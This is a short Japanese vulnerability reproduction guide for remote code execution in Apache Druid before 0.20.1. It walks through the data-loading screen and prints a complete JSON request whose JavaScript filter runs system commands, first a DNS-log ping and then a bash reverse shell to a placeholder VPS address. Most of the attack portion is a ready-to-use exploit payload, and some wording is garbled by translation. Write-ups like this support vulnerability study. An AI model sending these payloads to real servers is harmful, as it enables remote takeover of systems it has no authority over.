脆弱性の概要
Apache Druidは、分散データ処理システムです。Apache Druidには、ユーザーが提供したJavaScriptを実行し、さまざまなタイプのリクエストに埋め込まれるコードが含まれています。Druid 0.20.0以前のバージョンでは、ユーザーは悪意のあるリクエストを送信し、ApacheDruidの脆弱性を悪用して任意のコードを実行します。攻撃者は、悪意のあるリクエストを直接作成して、任意のコードを実行し、サーバーを制御する可能性があります。
影響を受けるバージョン
Apache Druid <0.20.1
脆弱性の再発
ポート8888にアクセスし、ApacheDruidホームページにアクセスします。
左上Load data
をクリックしLocal disk
、をクリックしてから、右をクリックしますConnect data
。
右側のフォームに記入してください。
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz
送信後のデータを
置き換えるDNSLpgテスト
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping dmlxi5.dnslog.cn -c 1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
リバースシェルテスト
に置き換えexec('ping dmlxi5.dnslog.cn -c 1')
て
exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/VPS_IP/VPS_PORT 0>&1')